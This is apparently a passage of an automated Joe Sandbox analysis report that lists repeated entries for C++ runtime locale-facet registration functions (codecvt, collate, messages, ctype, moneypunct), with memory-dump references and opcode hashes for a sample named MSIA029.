                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE11CE35D0061ADFCB09FB64AC416BE7B60AF84730F240459F911AB2D1CF78AE05AB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42301
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4230B
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 00F42345
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4235C
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4237C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 712880209-0
                                                                                                                                                                                                                                                  • Opcode ID: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
                                                                                                                                                                                                                                                  • Instruction ID: 62cd35d2af9d8fcc505e281b31c14597def64ee5e1ec76cc257d88074e9e2c9d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4901C031900619DBCB05EB64DC41ABEBBB0AF80720F250519F914AB3D2DF7C9E05AB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42396
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F423A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 00F423DA
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F423F1
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42411
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 712880209-0
                                                                                                                                                                                                                                                  • Opcode ID: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                                                                                                  • Instruction ID: 57ce6552136268a3d491f827611622f7b8a2138c9748beaac85eba20b44209cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF01C031900219DBCB05EB649C416BE7BB1BF80720F240419F9106B2D2CFBC9E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F424C0
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F424CA
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • collate.LIBCPMT ref: 00F42504
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4251B
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4253B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1007100420-0
                                                                                                                                                                                                                                                  • Opcode ID: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                                                                                                  • Instruction ID: a7b81481d332c681f47a52e0567b898596eb4934324653fbd4de54ca63b071c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C701D231900619DBCB05EB64DC456BE7B60AF84730F250419F910AB3D2CF789E05BB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4242B
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42435
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • collate.LIBCPMT ref: 00F4246F
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42486
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F424A6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1007100420-0
                                                                                                                                                                                                                                                  • Opcode ID: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                                                                                                  • Instruction ID: 7132f5c97c606bb244e5e9858aa27dfb9e73738f185fedd0a99bb2c089e9414c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13018031900619DBCB05EB64DC416BEBF61AF84730F250419F9146B3D2DF789E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F425EA
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F425F4
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • messages.LIBCPMT ref: 00F4262E
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42645
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42665
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2750803064-0
                                                                                                                                                                                                                                                  • Opcode ID: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                                                                                                  • Instruction ID: be96df7534fdcd8a7e0bfb0caf2f093d962d7e09ce5b93f291acaed534f545ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D701CC31900219DBCB05FB649C51ABE7BA0BF80760F254419F910AB3D2CF789E01EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • ctype.LIBCPMT ref: 00F42599
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F425B0
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 83828444-0
                                                                                                                                                                                                                                                  • Opcode ID: 87ba56ff98927c68e8fff656774dcee4362844064d50ded4d42426e04a173b03
                                                                                                                                                                                                                                                  • Instruction ID: 2cdcea3b5a7e975673b5cb798c51c75b653d07012a5ee140a503374c63e7d5cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87ba56ff98927c68e8fff656774dcee4362844064d50ded4d42426e04a173b03
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB010032800219DBCB00EB64CC41ABE7B70AF84320F280419F910AB2D2DF789E05FB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D6C4
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D6CE
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 00F3D708
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D71F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D73F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 712880209-0
                                                                                                                                                                                                                                                  • Opcode ID: 5f87fc3a4a6ddf2d5a3316ec87a3fddd45b3530befbb5103fc66b4806ca616d1
                                                                                                                                                                                                                                                  • Instruction ID: 360615233922cea01aa10b4ec6bf242756ccb5a8321d3f35ba88475999d20ddc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f87fc3a4a6ddf2d5a3316ec87a3fddd45b3530befbb5103fc66b4806ca616d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D019E35900619DBCB15FB64EC41ABE7BB1BF84730F250909F914AB2D2CF789E05AB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4267F
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42689
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • messages.LIBCPMT ref: 00F426C3
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F426DA
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F426FA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2750803064-0
                                                                                                                                                                                                                                                  • Opcode ID: 6db0bfbb12c82b7c20b93c57e6df71a3bd6bbc8400b51fe9a50af610b25041fb
                                                                                                                                                                                                                                                  • Instruction ID: 1f06e821dc248e3c11f7a7fa2646ab66b5a2c108001eb6143e31461e823eb404
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6db0bfbb12c82b7c20b93c57e6df71a3bd6bbc8400b51fe9a50af610b25041fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8701C031900619DFCB05FB64CC41ABE7B60AF84720F254459F910AB2D2DF789E05BB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4E8DF
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E8E9
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • messages.LIBCPMT ref: 00F4E923
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4E93A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E95A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2750803064-0
                                                                                                                                                                                                                                                  • Opcode ID: b7e9d97f8df1a78ef247cfa857ea181e1f833efa937f6eb0ca90a9757d4d3689
                                                                                                                                                                                                                                                  • Instruction ID: dfa706a8e1db87256e0b0976a30cd41c4509a8f88bf6616b9c363387b7360433
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7e9d97f8df1a78ef247cfa857ea181e1f833efa937f6eb0ca90a9757d4d3689
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3019232900619DFCB05EB64DC45ABE7BA1BF84720F250549F914AB3D2CF789E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4E84A
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E854
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • collate.LIBCPMT ref: 00F4E88E
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4E8A5
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E8C5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1007100420-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F429FD
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A07
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F42A41
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42A58
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42A78
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42968
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42972
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F429AC
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F429C3
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F429E3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EA9E
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EAA8
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F4EAE2
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EAF9
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EB19
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  APIs
